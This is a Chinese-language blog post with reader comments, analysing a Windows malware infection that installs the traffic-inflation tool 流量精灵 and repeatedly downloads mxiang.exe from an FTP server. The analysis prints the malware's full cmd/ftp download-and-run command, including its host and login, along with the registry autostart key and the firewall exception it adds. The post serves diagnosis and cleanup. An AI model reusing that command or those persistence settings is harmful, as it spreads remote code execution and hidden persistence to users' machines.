发现一个利用流量精灵的恶意软件

一朋友的电脑出了问题,通过远程协助检查,发现是被恶意软件入侵了。该软件在系统中安装了流量精灵,然后通过每隔一段时间从一个 ftp 服务器上下载一个可执行程序来检查和确保流量精灵在运行。目前只是抑制了该恶意软件的行为,但是感染方式和根治方法还没找到。

朋友的电脑是 Windows XP sp3 系统,平常也就看看股票、处理办公文档和浏览新闻网页。大概是四五天前感染上这个恶意软件的。虽然系统里安装了 Symantec Endpoint Protection,可是对这个软件没有反应,我猜想是因为这个软件的行为看起来像是用户自己进行的操作。

1. 该恶意软件组成

这个恶意软件会在用户的资料文件夹(即 %APPDATA%,例如 C:\Documents and Settings\Administrator\Application Data\ 目录下)中安装流量精灵,目的估计是增加其个人抢注的大量域名的流量以买个好价钱。流量精灵是一款针对网站站长、个人博客、网络写手、网站推广、网络营销、网店推广等各类 网络从业人员,用于提高网站流量,店铺/商品浏览量,网页PV(访问量),UV(独立访客),IP(独立IP)等的免费网络推广软件。

它会将这个流量精灵软件的主进程 jlguaji.exe 设置为开机自启动项。即在注册表中添加下面的项:

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'urlspace' = '%APPDATA%\jlguaji.exe -h'

还会添加修改 Windows 防火墙规则以允许该软件访问网络。类似于(下面只是其中一条):

[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\jlguaji.exe' = '%TEMP%\jlguaji.exe:*:Enabled:精灵软件'

另外,在 system32 文件夹(一般是 C:\Windows\system32)下还有一个 mxiang.exe 文件。该文件是会每隔一段时间就出来一次的。

因为不知道这个病毒是怎么感染上的,也没有病毒文件,不知道还有其他的什么东西被安装在系统中(肯定还有)。

2. 感染后的症状

该病毒(恶意软件)会在系统启动时自动运行,开启流量精灵来挂机。会占用大量的 CPU 和内存资源。

然后每隔一段时间 —— 有时候十三四分钟,有时候二十多分钟 —— 就会通过某个方法来触发 svchost.exe (在  C:\WINDOWS\System32\ 下)进程以调用 C:\WINDOWS\System32\Wbem 目录下的 wmiprvse.exe  进程来启用 ftp。

它会先创建一个记录文件 Ex1.dat 然后通过 ftp 来执行该文件中的内容从 ftp 上下载 mxiang.exe 并执行它:

cmd /c @echo open zuyong.3322.org>>Ex1.dat&@echo myftp>>Ex1.dat&@echo 123654>>Ex1.dat&@echo bin>>Ex1.dat&@echo get mxiang.exe>>Ex1.dat&@echo bye>>Ex1.dat&@ftp -s:Ex1.dat&del Ex1.dat&mxiang.exe&mxiang.exe

写的好看些就是:

cmd /c
@echo open zuyong.3322.org>>Ex1.dat
@echo myftp>>Ex1.dat
@echo 123654>>Ex1.dat
@echo bin>>Ex1.dat
@echo get mxiang.exe>>Ex1.dat
@echo bye>>Ex1.dat
@ftp -s:Ex1.dat
del Ex1.dat
mxiang.exe
mxiang.exe

可以看到该 ftp 服务器是用的动态域名 zuyong.3322.org,访问的 IP 是 203.171.230.41(查询到的信息是该 IP 属于河南省郑州市 景安计算机网络技术有限公司)。使用上面的信息登录 ftp 可以看到还有几个类似文件,估计都是用来搞小动作的:

Index of /
Name	Size	Date Modified
ctffmon.exe	317 kB	8/23/12 3:42:00 PM
hfs.exe	598 kB	7/27/12 10:45:00 AM
msiexeca.exe	621 kB	7/10/12 2:28:00 PM
mxiang.exe	317 kB	8/23/12 3:42:00 PM
mysql.exe	317 kB	8/23/12 3:42:00 PM
sougou.exe	317 kB	8/23/12 3:42:00 PM
svhost.exe	317 kB	8/23/12 3:43:00 PM

mxiang.exe 运行的时候会出错,信息如下:

mxiang.exe - 应用程序错误
"0x004012ed" 指令引用的 "0x0000000c" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。

如果没有上面的错误提示,估计这朋友也不会觉得有问题而找我。

3. 解决办法

解决办法请参考文后评论:用冰刃或者Xuetr直接删掉。我未做测试,无法提供更详细的信息。

感谢 FROYO 童鞋提供方法。

目前还没找到彻底的解决办法,因为不知道该病毒是通过什么方法来启动上面介绍的 ftp 远程下载文件过程的。所以我只能:

  1. 使用记事本编辑 \windows\system32\mxiang.exe 文件,将其内容清空后保存,然后编辑该文件的 属性 ——> 安全,将其权限针对所有用户和用户组都设置为“禁止”;
  2. 清理 jlguaji.exe 的开机自启动项;
  3. 将  %APPDATA% 目录下的流量精灵文件夹(忘记文件夹名称了)内的东西全部删除,然后编辑该文件夹的 属性 ——> 安全,将其权限针对所有用户和用户组都设置为“禁止”。

找到彻底的解决方案之后我会再更新此文。同时希望有经验的朋友提供解决方法。©

本文发表于水景一页。永久链接:<http://cnzhx.net/blog/a-malicious-soft-mxiang/>。转载请保留此信息及相应链接。

14 条关于 “发现一个利用流量精灵的恶意软件” 的评论

  1. 博主请联系我一下,我这也发现类似问题,服务器上被人挂流量精灵,并且是在为一个黄沾刷流量。郁闷之极

    • 你的是 Windows 服务器?我现在也是没找到根治的方法啊。你可以按照文中的方法试试看屏蔽它的通信服务器,然后再清除这几个文件,算是治标不治本的方法吧。

  2. 我也有一台服务器中招了 郁闷了

    现在使用了博主治标的方法

    如果博主有什么好方法敬请告知

    • 貌似治标之后一段时间就没问题了,猜测其启动与定期自动下载的那个文件有关。你也可以观察观察。
      如果有好方法了会给你留言的。

  3. 给博主提供个线索。我用的是“技术员联盟”的64位ghost版的win7系统,也有这样的情况。并且很奇怪。我在学校用移动的(铁通)网络就没有事。一旦连接到电信网 ,马上中招

    • 因为是在别人的电脑上发现的,后来就没有再接触了。谢谢你提供的信息!

  4. 我也遇到這個惡意軟件
    也去下載了冰刃跟Xuetr
    但是關鍵在於 不知道要刪除哪一個自動啟動的程式

时间过去太久,评论已关闭。
如果您有话要说,请到讨论区留言并给出此文章链接。
谢谢您的理解 :-)